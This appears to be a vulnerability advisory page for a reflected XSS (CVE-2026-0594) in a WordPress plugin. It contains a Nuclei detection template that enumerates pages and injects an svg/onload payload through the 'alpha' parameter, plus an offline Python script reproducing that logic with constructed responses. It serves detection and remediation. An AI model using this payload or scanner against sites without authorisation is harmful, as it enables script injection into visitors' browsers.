WordPress List Site Contributors < 1.1.8 - Reflected XSS
CVE-2026-0594
Verified
Description
The WordPress List Site Contributors plugin, in versions before 1.1.8, contains a reflected XSS caused by insufficient sanitization and escaping of the 'alpha' query parameter. An unauthenticated attacker can inject a script that executes in a victim's browser; exploitation requires user interaction, since the victim must open a crafted link.
Severity
Medium
Published Date
January 23, 2026
Template Author
m4sh_wacker
CVE-2026-0594.yaml
id: CVE-2026-0594

info:
  name: WordPress List Site Contributors < 1.1.8 - Reflected XSS
  author: m4sh_wacker
  severity: medium
  description: |
    The WordPress List Site Contributors plugin, in versions before 1.1.8, contains a reflected XSS caused by insufficient sanitization and escaping of the 'alpha' query parameter. An unauthenticated attacker can inject a script that executes in a victim's browser; exploitation requires user interaction, since the victim must open a crafted link.
  impact: |
    Unauthenticated attackers can inject scripts that execute in users' browsers, potentially stealing data or performing actions on their behalf.
  remediation: Update the List Site Contributors plugin to version 1.1.8 or later.
  reference:
    - https://github.com/m4sh-wacker/CVE-2026-0594-ListSiteContributors-Plugin-Exploit
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/026a2e0d-4d30-4133-9118-055026aa9f4a?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/list-site-contributors/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,list-site-contributors,xss

# Stage 1 enumerates pages through the WP REST API and keeps the slugs whose
# rendered content links with an 'alpha=' parameter (i.e. pages that embed the
# plugin's contributor list); stage 2 replays the payload against each of them.
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-json/wp/v2/pages HTTP/1.1
        Host: {{Hostname}}

    iterate-all: true
    extractors:
      - type: json
        name: slug
        part: body
        json:
          - '.[] | select(.content.rendered | contains("alpha=")) | .slug'
        internal: true

  - raw:
      - |
        GET /{{slug}}/?alpha=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "svg/onload=alert(document.domain)"
# digest: 4a0a004730450220066540dc800a841bdd86d63464f8579b634ecc4c302510b5262507aeb5029bfa022100f069cff959139adc9675a8af3add226349b78aeb95767889e73e3c875198a06d:922c64590222798bb761d5b6d8e72950
Remediation Steps
Update the List Site Contributors plugin to version 1.1.8 or later. Until the update is applied, a WAF rule that blocks requests whose alpha parameter contains angle brackets or quotes reduces exposure but does not fix the missing output escaping.
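The following Python script is an added illustration and is not part of the Nuclei template, the plugin, or the template author's exploit repository. It reproduces the template's two-stage logic (enumerate pages via /wp-json/wp/v2/pages, keep those whose rendered content contains "alpha=", then replay the payload against each slug) over captured response bodies, so it runs offline. The JSON and HTML samples are constructed, and the fake_fetch lookup stands in for a real HTTP client. It also shows a caveat worth knowing about the published matcher: because the matched word omits the leading "<", a page that reflects the parameter HTML-escaped (as WordPress esc_attr() would produce) still satisfies the word match, so confirming exploitability means checking for the unescaped payload rather than the bare string.

```python
import html
import json
from urllib.parse import quote

# Payload from the template, before URL encoding.
PAYLOAD = '"><svg/onload=alert(document.domain)>'
# The exact word the template's matcher looks for in the response body.
TEMPLATE_WORD = "svg/onload=alert(document.domain)"


def find_candidate_slugs(pages_json):
    """Stage 1: from a /wp-json/wp/v2/pages body, return slugs of pages whose
    rendered content links with an 'alpha=' parameter (same as the jq extractor)."""
    slugs = []
    for page in json.loads(pages_json):
        rendered = page.get("content", {}).get("rendered", "")
        if "alpha=" in rendered:
            slugs.append(page["slug"])
    return slugs


def build_probe_path(slug):
    """Stage 2 request path. Encoding only ", < and > (keeping / = ( ) literal)
    yields exactly the path the template sends."""
    return "/%s/?alpha=%s" % (slug, quote(PAYLOAD, safe="/=()"))


def template_matcher(body):
    """The published matcher: a plain substring test."""
    return TEMPLATE_WORD in body


def classify_reflection(body):
    """Stricter check: 'raw' if the payload is reflected unescaped (exploitable),
    'escaped' if it is reflected HTML-encoded (output escaping is in place),
    'none' if it is not reflected at all."""
    if PAYLOAD in body:
        return "raw"
    escaped_forms = (html.escape(PAYLOAD, quote=True), html.escape(PAYLOAD, quote=False))
    if any(form in body for form in escaped_forms):
        return "escaped"
    return "none"


def assess(pages_json, fetch):
    """Run both stages; fetch(path) returns the response body for a path."""
    return {slug: classify_reflection(fetch(build_probe_path(slug)))
            for slug in find_candidate_slugs(pages_json)}


# ---- constructed sample data (not captured from any real site) ----
PAGES_JSON = json.dumps([
    {"slug": "about", "content": {"rendered": "<p>About us</p>"}},
    {"slug": "contributors", "content": {"rendered":
        '<a href="/contributors/?alpha=A">A</a> <a href="/contributors/?alpha=B">B</a>'}},
    {"slug": "team", "content": {"rendered": '<a href="/team/?alpha=A">A</a>'}},
])

# Hypothetical vulnerable page: the parameter lands in an href unescaped.
VULNERABLE_BODY = ('<a class="current" href="/contributors/?alpha='
                   + PAYLOAD + '">All</a>')
# Hypothetical fixed page: same markup, but the value went through esc_attr().
ESCAPED_BODY = ('<a class="current" href="/team/?alpha='
                + html.escape(PAYLOAD, quote=True) + '">All</a>')

FAKE_RESPONSES = {
    build_probe_path("contributors"): VULNERABLE_BODY,
    build_probe_path("team"): ESCAPED_BODY,
}


def fake_fetch(path):
    """Stand-in for an HTTP client; returns a constructed body per path."""
    return FAKE_RESPONSES.get(path, "<p>Not found</p>")


if __name__ == "__main__":
    for slug, verdict in assess(PAGES_JSON, fake_fetch).items():
        body = fake_fetch(build_probe_path(slug))
        print("%-13s template word match=%-5s strict verdict=%s"
              % (slug, template_matcher(body), verdict))
```

Against the samples, both candidate pages satisfy the template's word match, but only the contributors page reflects the payload raw; the team page is reported as escaped and should not be counted as exploitable. To use this against a live host, replace fake_fetch with a function that performs the GET and returns the body, keeping the same path construction.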